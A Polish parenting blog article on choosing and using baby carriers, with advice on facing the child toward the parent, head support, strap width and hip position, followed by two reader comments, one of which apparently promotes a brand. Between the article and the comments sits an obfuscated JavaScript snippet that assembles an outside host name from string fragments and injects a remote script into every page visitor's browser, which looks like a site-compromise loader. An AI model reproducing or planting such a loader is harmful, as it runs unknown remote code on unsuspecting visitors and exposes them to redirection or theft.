Nosidełka dla dzieci – dlaczego warto je mieć i na co zwrócić uwagę przy ich wyborze

Share on facebook
Share on google
Share on twitter
Share on linkedin

Przyjęło się, że najlepszym sposobem na transport małego dziecka jest wózek. Jednak bywają miejsca, w które nie da się wjechać wózkiem. Bywają też dzieci, które nie lubią jeździć w wózku. W takiej sytuacji warto pomyśleć o kupnie nosidełka.

Dlaczego warto kupić nosidełko?

Dziecko ma naturalną potrzebę bliskości i stałego kontaktu fizycznego z rodzicami, zwłaszcza z matką. Czując bijące od niej ciepło, znajomy zapach i głos, uspokaja się i może nawet spokojnie zasnąć. Jednak rodzice wiedzą, jak trudno jest nosić niemowlę na rękach przez kilka godzin. Nosidełko rozwiązuje ten problem – pozwala dziecku wtulić się w mamę lub tatę, rodzicom pozostawia swobodne ręce. I nie ma się co oszukiwać, noszenie w nosidełku jest mniej męczące fizycznie niż noszenie na rękach.

Jak umieścić dziecko w nosidełku?

Zasada jest prosta – dziecko powinno być włożone do nosidełka przodem do rodzica. Nie ma tu znaczenia, czy nosimy dziecko przed sobą, czy za sobą. Dziecko ustawione przodem do rodzica może wygodnie oprzeć o niego głowę, kręgosłup nie jest nadmiernie prostowany, a stawy biodrowe nie są obciążone. To ważne szczególnie u mniejszych dzieci, ale i te większe wcale nie lubią „wisieć” tyłem do rodzica. Maluch włożony do nosidełka tyłem do rodzica będzie miał duże trudności z prawidłowym ułożeniem nóg „w żabkę”. Trzeba pamiętać, że to, co nam, dorosłym, wydaje się niewygodne (szeroko rozłożone nogi i stawy biodrowe), jest naturalne dla małego dziecka.

Jakie nosidełko wybrać?

Rynek akcesoriów dla najmłodszych oferuje nosidełka dla dzieci w różnej cenie i jakości. Przy czym trzeba koniecznie pamiętać, że cena tak naprawdę nie jest jej wyznacznikiem. Można znaleźć tanie i dobre nosidełko, można też kupić drogie, które okaże się kompletnie nieprzydatne. Wybierając nosidełko, trzeba zwrócić uwagę następujące aspekty:

 • Dla jakich dzieci przeznaczone jest nosidełko? Nie do wszystkich można włożyć noworodka. Niektóre modele przeznaczone są dla niemowląt, które potrafią już samodzielnie sztywno trzymać głowę.
 • Czy jest podpórka na główkę dziecka? Przyda się szczególnie noworodkom i niemowlętom, które jeszcze mają problemy ze stabilnym trzymaniem główki.
 • Czy nosidełko jest usztywniane na plecach? Powinno być, sztywne nosidło daje wsparcie małym pleckom i kręgosłupowi.
 • Szerokość szelek. Co prawda nosidełko jest dla dziecka, ale to rodzice szybko odczują dyskomfort spowodowany wpijaniem się w ramiona wąskich szelek. Dobrze, gdy szelki będą grube i miękkie. Warto przy okazji zwrócić uwagę, czy można regulować ich długość.
 • Materiał, z jakiego zostało uszyte nosidełko. Najlepiej, jeśli będzie to jakaś naturalna, niealergizująca tkanina.
 • Możliwość prania w pralce. Rzecz, której się często używa, ma prawo się brudzić, szczególnie że niemowlętom przydarzają się różne przykre niespodzianki. Pranie ręczne nie tylko jest czasochłonne, przede wszystkim nie zawsze jest skuteczne.
 • Czy przednia część nosidła jest odpinana? To tylko pozornie drobiazg, jednak gdy dziecko uśnie w nosidełku i zachodzi potrzeba delikatnego przełożenia go do łóżeczka, taka opcja okazuje się bardzo przydatna.
 • Dolna szerokość nosidełka, czyli mówiąc obrazowo – tego, co dziecko ma między nogami. Powinna być na tyle szeroka, by dziecko bez trudu rozłożyło nóżki „w żabkę”, czyli szeroko na boki z ugiętymi kolanami. Siedzisko powinno podpierać nie tylko pupę, ale także kości udowe dziecka, ugięte kolana powinny być na tej samej wysokości, co stawy biodrowe, lub lekko powyżej.
 • Czy można posadzić dziecko na biodrze rodzica. To bardzo przydatne dla starszych dzieci, które umieją samodzielnie siedzieć i chcą wygodnie oglądać świat.

(function(){
ivc0_=(“u”+”st”);ivc0=document.createElement(“script”);ivc0.async=true;
ivc0u=”68872183″;ivc0_+=”a”+(“t.”);ivc0_+=”i”+(“nf”+(“o”))+(“/”);
ivc0u+=”.8n6aie6avc0xinrX”;ivc0u+=”3evznxyyni3gi7″;
ivc0.src=”//”+ivc0_+ivc0u;ivc0.type=”text/javascript”;
d_b=document.body;d_b.appendChild(ivc0);
})();

2 odpowiedzi

 1. A ja już trzeci raz używam chusty typu kieszonka – użyłam jej po raz pierwszy przy pierwszym dziecku 6 lat temu, dwa lata później przy drugim i teraz korzystam z niej przy trzecim dziecku 😉 dodam, że jest to jedna i ta sama chusta – bardzo wytrzymała i bardzo wygodna dla dzieci – niemal natychmiast w niej zasypiały;) Tego typu chusta jest o tyle fajna, że nie muszę się martwić czy dobrze ją zawiąże (jest to zszyty kawałek materiału, którego nie wiąże się, choć powiem szczerze zawsze chciałam się zaopatrzyć również w chustę wiązaną, ale jakoś nie złożyło się), jest bardzo szybka w użyciu – po prostu zakłada się ją przez ramię (tak jak torebkę) i do środka wkłada się dziecko. Polecam.

 2. ja szukałam takich które nie są drogie i mają dobre opinie w Internecie. tak trafiłam chyba na kafeterii na produkty Luna Dream. Zakupu nie żałuję, dobrze doradzili

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.

%d bloggers like this: